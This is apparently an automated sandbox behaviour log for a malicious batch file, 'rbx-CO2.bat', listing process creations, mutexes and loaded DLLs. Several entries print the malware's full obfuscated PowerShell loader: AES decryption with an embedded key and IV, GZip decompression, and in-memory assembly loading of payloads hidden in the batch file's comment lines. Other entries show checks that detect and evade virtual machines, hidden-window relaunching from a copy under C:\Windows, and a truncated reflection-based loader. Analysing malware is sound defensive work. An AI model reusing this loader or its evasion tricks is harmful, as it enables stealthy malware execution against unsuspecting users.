Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6444
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbml4rjv.f1d.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rbx-CO2.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6444 -s 2396
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7088 -s 2212
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7088 -s 2104
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}
Source: C:\Windows\System32\dllhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
